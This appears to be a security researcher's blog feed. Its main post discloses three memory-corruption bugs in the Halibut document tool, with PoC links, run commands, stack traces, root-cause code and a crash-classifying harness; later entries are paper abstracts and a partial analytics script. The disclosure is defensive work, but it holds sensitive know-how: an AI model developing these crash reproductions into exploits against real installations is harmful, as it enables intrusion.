automatically using a combination of dynamic tracing and symbolic analysis. My
work has led to two academic conference publications, one …</p><p>Over the past year I've been studying memory corruption vulnerabilities in Linux
C/C++ programs, culminating in the open-sourcing of a framework called
<a href="https://github.com/carter-yagemann/arcus">ARCUS</a> to find and explain them
automatically using a combination of dynamic tracing and symbolic analysis. My
work has led to two academic conference publications, one that appeared in this
year's
<a href="https://www.usenix.org/conference/usenixsecurity21/presentation/yagemann">USENIX Security Symposium</a>
and another that will appear next month at <a href="https://sigsac.org/ccs/CCS2021/accepted-papers.html">ACM CCS</a>.</p>
<p>Since then, I've been going through the
<a href="https://popcon.debian.org/">Debian Popularity Contest</a> and analyzing
packages, leading to the discovery of vulnerabilities like
<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42006">CVE-2021-42006</a>.
In this post, I'd like to share <strong>3</strong> new vulnerabilities I've discovered in a
program called <a href="https://www.chiark.greenend.org.uk/~sgtatham/halibut/">Halibut</a>,
which is a <em>document preparation system</em> that currently sits at rank 54,752 (by
number of installs) out of 182,832 packages in the popularity contest.</p>
<h2>Environment</h2>
<p>I'm using the latest official release of Halibut, version 1.2, which is
available on <a href="https://packages.debian.org/bullseye/halibut">Debian Bullseye</a>
and <a href="https://packages.ubuntu.com/hirsute/halibut">Ubuntu Hirsute</a>, to name a
few Linux distributions. The target architecture is x86-64.</p>
<p><a name="poc-halibut-winhelp-df"></a></p>
<h2>Double Free in <code>cleanup_index()</code> in <code>index.c</code></h2>
<p><strong>Steps to Reproduce:</strong></p>
<ol>
<li>Download the <a href="https://carteryagemann.com/docs/poc-halibut-winhelp-df">PoC</a>.</li>
<li>Run: <code>halibut --winhelp poc-halibut-winhelp-df</code></li>
</ol>
<p><strong>Stack Trace:</strong></p>
<div class="highlight"><pre><span></span><code>#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7e1c537 in __GI_abort () at abort.c:79
#2 0x00007ffff7e75768 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f83e2d "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7e7ca5a in malloc_printerr (str=str@entry=0x7ffff7f861c8 "double free or corruption (fasttop)") at malloc.c:5347
#4 0x00007ffff7e7dd55 in _int_free (av=0x7ffff7fb5b80 <main_arena>, p=0x5555556a5500, have_lock=0) at malloc.c:4266
#5 0x00005555555784c5 in sfree (p=0x5555556a5510) at ../malloc.c:63
#6 0x000055555557867d in free_word_list (w=0x5555556ab7b0) at ../malloc.c:130
#7 0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#8 0x0000555555578154 in main (argc=0, argv=0x7fffffffe468) at ../main.c:404
</code></pre></div>
<p><a name="poc-halibut-text-uaf"></a></p>
<h2>Use-After-Free in <code>cleanup_index()</code> in <code>index.c</code></h2>
<p><strong>Steps to Reproduce:</strong></p>
<ol>
<li>Download the <a href="https://carteryagemann.com/docs/poc-halibut-text-uaf">PoC</a>.</li>
<li>Run: <code>halibut --text poc-halibut-text-uaf</code></li>
</ol>
<p><strong>Stack Trace:</strong></p>
<div class="highlight"><pre><span></span><code>#0 __GI___libc_free (mem=0x100000001) at malloc.c:3102
#1 0x00005555555784c5 in sfree (p=0x100000001) at ../malloc.c:63
#2 0x000055555557867d in free_word_list (w=0x7000700070007) at ../malloc.c:130
#3 0x000055555557869a in free_word_list (w=0x5555556f1900) at ../malloc.c:132
#4 0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#5 0x0000555555578154 in main (argc=0, argv=0x7fffffffe478) at ../main.c:404
</code></pre></div>
<p><strong>Note:</strong> This is not the same vulnerability as the one above. Notice the
recursion inside <code>free_word_list</code> and how the PoC triggers a segmentation fault
rather than a double free abort.</p>
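<p>Because the PoCs end differently (an abort from glibc's double-free check versus a segmentation fault), a small harness can tell them apart by the signal that terminates Halibut. This is a minimal sketch of ours, not part of ARCUS or Halibut: the helpers <code>classify_exit</code> and <code>run_poc</code> are hypothetical, and it assumes a POSIX system with <code>halibut</code> on the <code>PATH</code>. It relies on Python's <code>subprocess</code> reporting death by signal N as a return code of -N, and it runs Halibut in a throwaway directory so any output files it writes do not clutter the working directory.</p>
<div class="highlight"><pre><span></span><code>import os
import signal
import subprocess
import sys
import tempfile


def classify_exit(returncode):
    """Describe how a child process ended, given its subprocess return code.

    On POSIX, subprocess reports termination by signal N as returncode -N.
    """
    if returncode >= 0:
        return f"exited with status {returncode}"
    try:
        name = signal.Signals(-returncode).name
    except ValueError:
        name = f"signal {-returncode}"
    hints = {
        "SIGABRT": "abort, e.g. a glibc heap check such as a detected double free",
        "SIGSEGV": "segmentation fault, e.g. dereferencing freed or bogus memory",
    }
    return f"killed by {name} ({hints.get(name, 'no hint')})"


def run_poc(backend_flag, poc_path, timeout=30):
    """Run halibut on one PoC inside a scratch directory and classify the result."""
    poc_path = os.path.abspath(poc_path)  # cwd changes below, so resolve it first
    with tempfile.TemporaryDirectory() as scratch:
        proc = subprocess.run(
            ["halibut", backend_flag, poc_path],
            cwd=scratch,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            timeout=timeout,
        )
    return classify_exit(proc.returncode)


if __name__ == "__main__":
    # Example: python classify_poc.py --text poc-halibut-text-uaf
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} BACKEND_FLAG POC_FILE", file=sys.stderr)
    else:
        print(run_poc(sys.argv[1], sys.argv[2]))
</code></pre></div>
<p>If your build behaves like the stack traces above, the <code>--winhelp</code> PoC should be reported as <code>SIGABRT</code> and the <code>--text</code> PoC as <code>SIGSEGV</code>.</p>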
<p><a name="poc-halibut-info-uaf"></a></p>
<h2>Use-After-Free in <code>info_width_internal()</code> in <code>bk_info.c</code></h2>
<p><strong>Steps to Reproduce:</strong></p>
<ol>
<li>Download the <a href="https://carteryagemann.com/docs/poc-halibut-info-uaf">PoC</a>.</li>
<li>Run: <code>halibut --info poc-halibut-info-uaf</code></li>
</ol>
<p><strong>Stack Trace:</strong></p>
<div class="highlight"><pre><span></span><code>#0 info_width_internal (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:974
#1 0x000055555559c419 in info_width_internal_list (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:953
#2 0x000055555559c669 in info_width_internal (words=0x5555556ed5b0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:1009
#3 0x000055555559c776 in info_width_xrefs (ctx=0x7fffffffdf80, words=0x5555556ed5b0) at ../bk_info.c:1041
#4 0x000055555557b0cb in wrap_para (text=0x5555556ed5b0, width=66, subsequentwidth=66, widthfn=0x55555559c751 <info_width_xrefs>, ctx=0x7fffffffdf80, natural_space=0) at ../misc.c:328
#5 0x000055555559cab8 in info_para (text=0x5555556e8440, prefix=0x5555556a2d30, prefixextra=0x5555555c859c L".", input=0x5555556bcf80, keywords=0x5555556e1cd0, indent=1, extraindent=3, width=66,
cfg=0x7fffffffdf80) at ../bk_info.c:1120
#6 0x000055555559b38a in info_backend (sourceform=0x5555556a7dd0, keywords=0x5555556e1cd0, idx=0x5555556a2390, unused=0x0) at ../bk_info.c:579
#7 0x0000555555578119 in main (argc=0, argv=0x7fffffffe478) at ../main.c:398
</code></pre></div>
<h2>Root Cause</h2>
<p>According to ARCUS, the root cause appears to be frees that occur within
<code>get_token</code> in <code>input.c</code>. Specifically, it labels Line 416:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">rsc</span><span class="p">.</span><span class="n">text</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">in</span><span class="o">-></span><span class="n">pushback_chars</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dupstr</span><span class="p">(</span><span class="n">rsc</span><span class="p">.</span><span class="n">text</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">prevpos</span><span class="p">);</span>
<span class="w"> </span><span class="n">sfree</span><span class="p">(</span><span class="n">rsc</span><span class="p">.</span><span class="n">text</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
</code></pre></div>
<p>And Line 469:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">c</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'{'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="cm">/* tok_lbrace */</span>
<span class="w"> </span><span class="n">ret</span><span class="p">.</span><span class="n">type</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tok_lbrace</span><span class="p">;</span>
<span class="w"> </span><span class="n">sfree</span><span class="p">(</span><span class="n">rsc</span><span class="p">.</span><span class="n">text</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ret</span><span class="p">;</span>
</code></pre></div>
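<p>To make the double-free mechanism concrete, here is a toy Python model. It is not Halibut's code and not its fix; <code>ToyHeap</code>, <code>run</code>, and the error classes are hypothetical. It assumes, as the ARCUS report suggests, that a buffer freed inside <code>get_token</code> is still referenced from a word list that <code>cleanup_index()</code> later frees, and contrasts that with a single-owner discipline where the buffer is freed exactly once.</p>
<div class="highlight"><pre><span></span><code>class DoubleFreeError(Exception):
    """Stands in for glibc aborting on a double free."""


class UseAfterFreeError(Exception):
    """Stands in for reading memory that was already freed."""


class ToyHeap:
    """Tracks live allocations by integer handle, like a minimal malloc/free."""

    def __init__(self):
        self._next_handle = 1
        self._live = {}

    def alloc(self, data):
        handle = self._next_handle
        self._next_handle += 1
        self._live[handle] = data
        return handle

    def free(self, handle):
        if handle not in self._live:
            raise DoubleFreeError(f"double free of handle {handle}")
        del self._live[handle]

    def read(self, handle):
        if handle not in self._live:
            raise UseAfterFreeError(f"use after free of handle {handle}")
        return self._live[handle]

    def live_count(self):
        return len(self._live)


def run(heap, single_owner, read_before_cleanup=False):
    """Hypothetical flow: the tokenizer allocates a token's text and a word
    list keeps a copy of the same handle (an alias)."""
    text = heap.alloc("{")
    word_list = [text]

    if not single_owner:
        heap.free(text)  # early free, cf. sfree(rsc.text) on the '{' path

    if read_before_cleanup:
        for handle in word_list:
            heap.read(handle)  # a backend walking the words before cleanup

    for handle in word_list:
        heap.free(handle)  # final cleanup, cf. free_word_list()


if __name__ == "__main__":
    try:
        run(ToyHeap(), single_owner=False)
    except DoubleFreeError as err:
        print(err)
    heap = ToyHeap()
    run(heap, single_owner=True)
    print("live allocations after cleanup:", heap.live_count())
</code></pre></div>
<p>Run as a script, it prints <code>double free of handle 1</code> and then <code>live allocations after cleanup: 0</code>. In real C code, setting <code>rsc.text</code> to <code>NULL</code> after <code>sfree</code> would not help on its own if the word list holds a separate copy of the pointer, which is why the model frames the fix as a question of which structure owns the buffer.</p>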
<p>There are several other lines in <code>get_token</code> that also call <code>sfree</code> and might be
problematic.</p>Bunkerbuster to Appear in CCS'212021-09-06T13:00:00-04:002021-09-06T13:00:00-04:00Carter Yagemanntag:carteryagemann.com,2021-09-06:/ccs-21-bunkerbuster.html<p>My coauthors and I will be presenting the paper, <em>Automated Bug
Hunting With Data-Driven Symbolic Root Cause Analysis</em>, at
<a href="https://sigsac.org/ccs/CCS2021/index.html">CCS 2021</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>The increasing cost of successful cyberattacks has caused a mindset
shift, whereby defenders now employ proactive defenses, namely
software bug hunting, alongside existing reactive measures (firewalls,
IDS, IPS) to protect systems. Unfortunately the path from
hunting bugs to deploying patches remains laborious and expensive,
requires human expertise, and still misses serious memory
corruptions. Motivated by these challenges, we propose bug hunting
using symbolically reconstructed states based on execution
traces to achieve better detection and root cause analysis of overflow,
use-after-free, double free, and format string bugs across user
programs and their imported libraries. We discover that with the
right use of widely available hardware processor tracing and partial
memory snapshots, powerful symbolic analysis can be used on
real-world programs while managing path explosion. Better yet,
data can be captured from production deployments of live software
on end-host systems transparently, aiding in the analysis of user
clients and long-running programs like web servers.</p>
<p>We implement a prototype of our design, Bunkerbuster, for Linux
and evaluate it on 15 programs, where it finds 39 instances of our
target bug classes, 8 of which have never before been reported and
have led to 1 EDB and 3 CVE IDs being issued. These 0-days were
patched by developers using Bunkerbuster’s reports, independently
validating their usefulness. In a side-by-side comparison, our system
uncovers 8 bugs missed by AFL and QSYM, and correctly classifies
4 that were previously detected, but mislabeled by AddressSanitizer.
Our prototype accomplishes this with 7.21% recording overhead.</p>
</blockquote>
<p>The code and data for this project will be made available on my
public GitHub <a href="https://github.com/carter-yagemann/arcus">account</a>.</p>MARSARA to Appear in CCS'212021-08-31T17:00:00-04:002021-08-31T17:00:00-04:00Carter Yagemanntag:carteryagemann.com,2021-08-31:/ccs-21-marsara.html<p>My coauthors and I will be presenting a paper on "Validating the Integrity of
Audit Logs Against Execution Repartitioning Attacks" at
<a href="https://sigsac.org/ccs/CCS2021/index.html">CCS 2021</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>Provenance-based causal analysis of audit logs has proven to be
an invaluable method of investigating system intrusions. However,
it also suffers from dependency explosion, whereby long-running
processes accumulate many dependencies that are hard to unravel.
Execution unit partitioning addresses this by segmenting dependencies
into units of work, such as isolating the events that processed
a single HTTP request. Unfortunately, we discover that current
designs have a semantic gap problem due to how system calls and
application log messages are used to infer complex internal program
states. We demonstrate how attackers can modify existing
code exploits to control event partitioning, breaking links in the
attack and framing innocent users. We also show how our techniques
circumvent existing program and log integrity defenses.</p>
<p>We then propose a new design for execution unit partitioning
that leverages additional runtime data to yield verified partitions
that resist manipulation. Our design overcomes the technical challenges
of minimizing additional overhead while accurately connecting low level
code instructions to high level audit events, in
part with the use of commodity hardware processor tracing. We
implement a prototype of our design for Linux, MARSARA, and
extensively evaluate it on 14 real-world programs, targeted with
expertly crafted exploits. MARSARA’s verified partitions successfully
capture all the attack provenances while only reintroducing 2.82%
of false dependencies, in the worst case, with an average overhead
of 8.7%. Using a new metric called Partitioning Attack Surface, we
show that MARSARA eliminates 47,642 more repartitioning gadgets
per program than integrity defenses like CFI, demonstrating our
prototype’s effectiveness and the novelty of the attacks it prevents.</p>
</blockquote>"Modeling Large-Scale Manipulation in Open Stock Markets" to Appear in IEEE Security & Privacy2021-05-26T14:00:00-04:002021-05-26T14:00:00-04:00Carter Yagemanntag:carteryagemann.com,2021-05-26:/sp21-market-manipulation.html<p>An article my coauthors and I wrote on automated large-scale market manipulation will be
appearing in the November issue of IEEE Security & Privacy. It is currently available early
access <a href="https://doi.org/10.1109/MSEC.2021.3076717">here</a>. Below is the abstract:</p>
<blockquote>
<p>This article studies the feasibility of using a botnet to automate stock market manipulation,
incorporating data …</p></blockquote><p>An article my coauthors and I wrote on automated large-scale market manipulation will be
appearing in the November issue of IEEE Security & Privacy. It is currently available in early
access <a href="https://doi.org/10.1109/MSEC.2021.3076717">here</a>. Below is the abstract:</p>
<blockquote>
<p>This article studies the feasibility of using a botnet to automate stock market manipulation,
incorporating data from U.S. Securities and Exchange Commission case files, security surveys
of online retail brokerage accounts, and dark web marketplace listings.</p>
</blockquote>ARCUS System and Dataset Released2021-02-08T11:00:00-05:002021-02-08T11:00:00-05:00Carter Yagemanntag:carteryagemann.com,2021-02-08:/arcus-open-source.html<p>We have released the <a href="https://github.com/carter-yagemann/arcus">source code</a> and
evaluation <a href="https://super.gtisc.gatech.edu/arcus-dataset-public.tgz">dataset</a> for
"ARCUS: Symbolic Root Cause Analysis of Exploits in Production Systems," which will
be appearing at <a href="https://www.usenix.org/conference/usenixsecurity21">USENIX Security 2021</a>
in August, 2021.</p>
<p>The paper will be ready for publication in about a month.</p>Vulnerability Root Cause Analysis Approach "ARCUS" to Appear in USENIX'212020-12-12T10:00:00-05:002020-12-12T10:00:00-05:00Carter Yagemanntag:carteryagemann.com,2020-12-12:/usenix-21-arcus.html<p>My coauthors and I will be presenting a paper "ARCUS: Symbolic Root Cause Analysis of
Exploits in Production Systems" at
<a href="https://www.usenix.org/conference/usenixsecurity21">USENIX Security 2021</a> in August,
2021. Below is a preview of the abstract:</p>
<blockquote>
<p>End-host runtime monitors (e.g., CFI, system call IDS) flag
processes in response to symptoms of a possible attack. Unfortunately,
the symptom (e.g., invalid control transfer) may
occur long after the root cause (e.g., buffer overflow), creating
a gap whereby bug reports received by developers contain
(at best) a snapshot of the process long after it executed the
buggy instructions. To help system administrators provide developers with
more concise reports, we propose ARCUS, an
automated framework that performs root cause analysis over
the execution flagged by the end-host monitor. ARCUS works
by testing "what if" questions to detect vulnerable states, systematically
localizing bugs to their concise root cause while
finding additional enforceable checks at the program binary
level to demonstrably block them. Using hardware-supported
processor tracing, ARCUS decouples the cost of analysis
from host performance.</p>
<p>We have implemented ARCUS and evaluated it on 31 vulnerabilities across
20 programs along with over 9,000 test
cases from the RIPE and Juliet suites. ARCUS identifies the
root cause of all tested exploits — with 0 false positives or
negatives — and even finds 4 new 0-day vulnerabilities in
traces averaging 4,000,000 basic blocks. ARCUS handles
programs compiled from upwards of 810,000 lines of C/C++
code without needing concrete inputs or re-execution.</p>
</blockquote>
<p>In the coming months, we will also publish the source code for ARCUS and some sample
data for the community to use. ARCUS has already led to the discovery of 4 novel
vulnerabilities, one of which is currently public:
<a href="https://www.exploit-db.com/exploits/47254">EDB-47254</a>. The others will be released
in the coming months.</p>"Justitia" Biometric Privacy to Appear in ASIACCS'212020-10-26T10:00:00-04:002020-10-26T10:00:00-04:00Carter Yagemanntag:carteryagemann.com,2020-10-26:/asiaccs-21-justitia.html<p>My coauthors and I will be presenting the paper "Cryptographic Key Derivation from
Biometric Inferences for Remote Authentication" at
<a href="https://asiaccs2021.comp.polyu.edu.hk/">Asia CCS 2021</a> in June of next year. Below
is a preview of the abstract:</p>
<blockquote>
<p>Biometric authentication is getting increasingly popular because of its appealing
usability and improvements in biometric sensors …</p></blockquote><p>My coauthors and I will be presenting the paper "Cryptographic Key Derivation from
Biometric Inferences for Remote Authentication" at
<a href="https://asiaccs2021.comp.polyu.edu.hk/">Asia CCS 2021</a> in June of next year. Below
is a preview of the abstract:</p>
<blockquote>
<p>Biometric authentication is getting increasingly popular because of its appealing
usability and improvements in biometric sensors. At the same time, it raises
serious privacy concerns since the common deployment involves storing
bio-templates in remote servers. Current solutions propose to keep these templates
on the client's device, outside the server's reach. This binds the client to the
initial device. A more attractive solution is to have the server authenticate the
client, thereby decoupling them from the device.</p>
<p>Unfortunately, existing biometric
template protection schemes suffer from either poor practicality or poor accuracy. The
state-of-the-art deep learning (DL) solutions solve the accuracy problem in
face- and voice-based verification. However, existing privacy-preserving methods do
not accommodate the DL methods, as they are tailored to the hand-crafted feature space
of specific modalities in general.</p>
<p>In this work, we propose a novel pipeline, Justitia, that makes DL-inferences of
face and voice biometrics compatible with the standard privacy-preserving primitives,
like fuzzy extractors (FE). For this, we first form a bridge between Euclidean (or
cosine) space of DL and Hamming space of FE, while maintaining the accuracy and
privacy of underlying schemes. We also introduce efficient noise handling methods to
keep the FE scheme practically applicable.</p>
<p>We implement an end-to-end prototype to evaluate our design, then show how to improve
the security for sensitive authentications and usability for non-sensitive, day-to-day,
authentications. Justitia achieves the same error rates as the plaintext baseline on the YouTube
Faces benchmark: 0.33% false rejection at zero false acceptance.
Moreover, combining face and voice achieves 1.32% false rejection at zero false acceptance.
According to our systematic security assessments, conducted through prior approaches
and our novel black-box method, Justitia achieves ~25 bits and ~33 bits of security
guarantees for face- and face&voice-based pipelines, respectively.</p>
</blockquote>"Bot2Stock" to Appear in ACSAC'202020-10-04T10:00:00-04:002020-10-04T10:00:00-04:00Carter Yagemanntag:carteryagemann.com,2020-10-04:/acsac-20-bot2stock.html<p>My coauthors and I will be presenting a paper "On the Feasibility of Automating Stock Market
Manipulation" at <a href="https://www.acsac.org/2020/program/papers/">ACSAC 2020</a> in December.
Below is a preview of the abstract:</p>
<blockquote>
<p>This work presents the first findings on the feasibility of using
botnets to automate stock market manipulation. Our analysis incorporates
data …</p></blockquote><p>My coauthors and I will be presenting a paper "On the Feasibility of Automating Stock Market
Manipulation" at <a href="https://www.acsac.org/2020/program/papers/">ACSAC 2020</a> in December.
Below is a preview of the abstract:</p>
<blockquote>
<p>This work presents the first findings on the feasibility of using
botnets to automate stock market manipulation. Our analysis incorporates
data gathered from SEC case files, security surveys of online
brokerages, and dark web marketplace data. We address several
technical challenges, including how to adapt existing techniques
for automation, the cost of hijacking brokerage accounts, avoiding
detection, and more. We consolidate our findings into a working
proof-of-concept, man-in-the-browser malware, Bot2Stock, capable
of controlling victim email and brokerage accounts to commit fraud.
We evaluate our bots and protocol using agent-based market simulations,
where we find that a 1.5% ratio of bots to benign traders
yields a 2.8% return on investment (ROI) per attack. Given the short
duration of each attack (< 1 minute), achieving this ratio is trivial,
requiring only 4 bots to target stocks like IBM. 1,000 bots, cumulatively
gathered over 1 year, can turn $100,000 into $1,022,000,
placing Bot2Stock on par with existing botnet scams.</p>
</blockquote>
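<p>As a rough sanity check on the scale of these figures, the arithmetic below uses only numbers quoted in the abstract. It does not reproduce the paper's market simulation, and both derived quantities rest on assumptions of ours: that the 1.5% ratio is measured against benign traders active during the same short attack window, and that returns compound fully at the 2.8% per-attack ROI.</p>
<div class="highlight"><pre><span></span><code>import math

# Figures quoted in the abstract.
BOT_TO_BENIGN_RATIO = 0.015   # 1.5% ratio of bots to benign traders
BOTS_FOR_IBM = 4              # bots said to suffice for stocks like IBM
ROI_PER_ATTACK = 0.028        # 2.8% return on investment per attack
START_CAPITAL = 100_000
END_CAPITAL = 1_022_000

# Assumption: 4 bots at a 1.5% ratio implies this many benign traders in the window.
implied_benign_traders = BOTS_FOR_IBM / BOT_TO_BENIGN_RATIO

# Assumption: each attack compounds the whole bankroll at the per-attack ROI.
growth = END_CAPITAL / START_CAPITAL
attacks_needed = math.ceil(math.log(growth) / math.log(1 + ROI_PER_ATTACK))

print(f"implied benign traders per window: {implied_benign_traders:.0f}")
print(f"compounded attacks to grow {growth:.2f}x: {attacks_needed}")
</code></pre></div>
<p>Under those assumptions it reports about 267 benign traders per attack window and 85 compounded attacks to turn $100,000 into the quoted $1,022,000.</p>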
<p>The evaluation artifact is also <a href="https://www.acsac.org/2020/program/artifacts/">available</a>.
However, be warned that we used a 32-core server to generate the results, so
casual users may find the experiments difficult to reproduce.</p>New CVE Published (CVE-2020-14931)2020-06-29T18:00:00-04:002020-06-29T18:00:00-04:00Carter Yagemanntag:carteryagemann.com,2020-06-29:/cve-2020-14931.html<p>CVE-2020-14931 has been assigned to a vulnerability I found in DMitry.
The details are available <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-14931">here</a>.</p>
<p>This issue is currently being <a href="https://github.com/jaygreig86/dmitry/issues/4">patched</a>.</p>H&R Block App Analytics for 20202020-06-18T17:30:00-04:002020-06-18T17:30:00-04:00Carter Yagemanntag:carteryagemann.com,2020-06-18:/hrb-analytics-2020.html<p>Two years ago I started a <a href="https://carteryagemann.com/hrb-analytics.html">series</a> about
using the analytics publicly released by the U.S. government to glean some information
about H&R Block's mobile apps. I'm a few months late this year, but it's time to
update the numbers for the 2020 tax year. The 2019 numbers are available
<a href="https://carteryagemann.com/hrb-analytics-2019.html">here</a>.</p>
<p>This time I went ahead and updated the code to make parsing a little more flexible:</p>
<div class="highlight"><pre><span></span><code><span class="p">:::</span><span class="n">python</span>
<span class="c1">#!/usr/bin/env python</span>
<span class="kn">from</span> <span class="nn">__future__</span> <span class="kn">import</span> <span class="n">print_function</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="k">def</span> <span class="nf">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">):</span>
<span class="w"> </span><span class="sd">""" Parses subtokens and returns a dictionary. If invalid, None is returned.</span>
<span class="sd"> We expect all user agents to start with "HBR MOBILE", after which we can encounter</span>
<span class="sd"> OS, device, app, authentication, browser, and app version strings. Everything except</span>
<span class="sd"> version is matched using exact string comparisons. Version uses a regex.</span>
<span class="sd"> """</span>
<span class="n">res</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'OS'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'DEVICE'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'APP'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'AUTH'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'VERSION'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'BROWSER'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">}</span>
<span class="n">token_mapping</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'ANDROID'</span><span class="p">:</span> <span class="s1">'OS'</span><span class="p">,</span> <span class="s1">'IOS'</span><span class="p">:</span> <span class="s1">'OS'</span><span class="p">,</span>
<span class="s1">'PHONE'</span><span class="p">:</span> <span class="s1">'DEVICE'</span><span class="p">,</span> <span class="s1">'TABLET'</span><span class="p">:</span> <span class="s1">'DEVICE'</span><span class="p">,</span>
<span class="s1">'MYBLOCK'</span><span class="p">:</span> <span class="s1">'APP'</span><span class="p">,</span> <span class="s1">'TAXES'</span><span class="p">:</span> <span class="s1">'APP'</span><span class="p">,</span>
<span class="s1">'TOUCHID'</span><span class="p">:</span> <span class="s1">'AUTH'</span><span class="p">,</span> <span class="s1">'FACEID'</span><span class="p">:</span> <span class="s1">'AUTH'</span><span class="p">,</span>
<span class="s1">'Mozilla'</span><span class="p">:</span> <span class="s1">'BROWSER'</span><span class="p">}</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'HRB'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'MOBILE'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="k">for</span> <span class="n">token</span> <span class="ow">in</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">:]:</span>
<span class="k">if</span> <span class="n">token</span> <span class="ow">in</span> <span class="n">token_mapping</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="n">token_mapping</span><span class="p">[</span><span class="n">token</span><span class="p">]]</span> <span class="o">=</span> <span class="n">token</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">match</span><span class="p">(</span><span class="s1">'v?[0-9]+\.[0-9]+\.[0-9]+'</span><span class="p">,</span> <span class="n">token</span><span class="p">):</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">token</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Unknown token: </span><span class="si">%s</span><span class="s1"> from </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">tokens</span><span class="p">)),</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="c1"># Cleanups:</span>
<span class="c1"># 1) Some versions of the Android app prefix 'v' onto version</span>
<span class="k">if</span> <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'v'</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="mi">1</span><span class="p">:]</span>
<span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="o">==</span> <span class="mi">6</span>
<span class="k">return</span> <span class="n">res</span>
<span class="k">def</span> <span class="nf">is_hrb</span><span class="p">(</span><span class="n">year</span><span class="p">,</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">):</span>
<span class="w">    </span><span class="sd">""" Validate that a line should be parsed and added to the buckets.</span>
<span class="sd">    Specifically, the entry must contain the right year, have an HRB user-agent,</span>
<span class="sd">    and contain the filter keyword if one was provided.</span>
<span class="sd">    """</span>
    <span class="k">if</span> <span class="n">line</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="n">year</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">False</span>
    <span class="k">if</span> <span class="n">line</span><span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'HRB'</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">False</span>
    <span class="k">if</span> <span class="nb">filter</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span> <span class="ow">and</span> <span class="nb">filter</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">False</span>
    <span class="k">return</span> <span class="kc">True</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o"><</span> <span class="mi">3</span><span class="p">:</span>
